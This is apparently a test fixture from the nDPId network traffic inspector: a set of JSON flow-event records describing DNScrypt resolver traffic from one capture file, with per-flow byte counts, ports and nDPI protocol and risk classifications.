+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
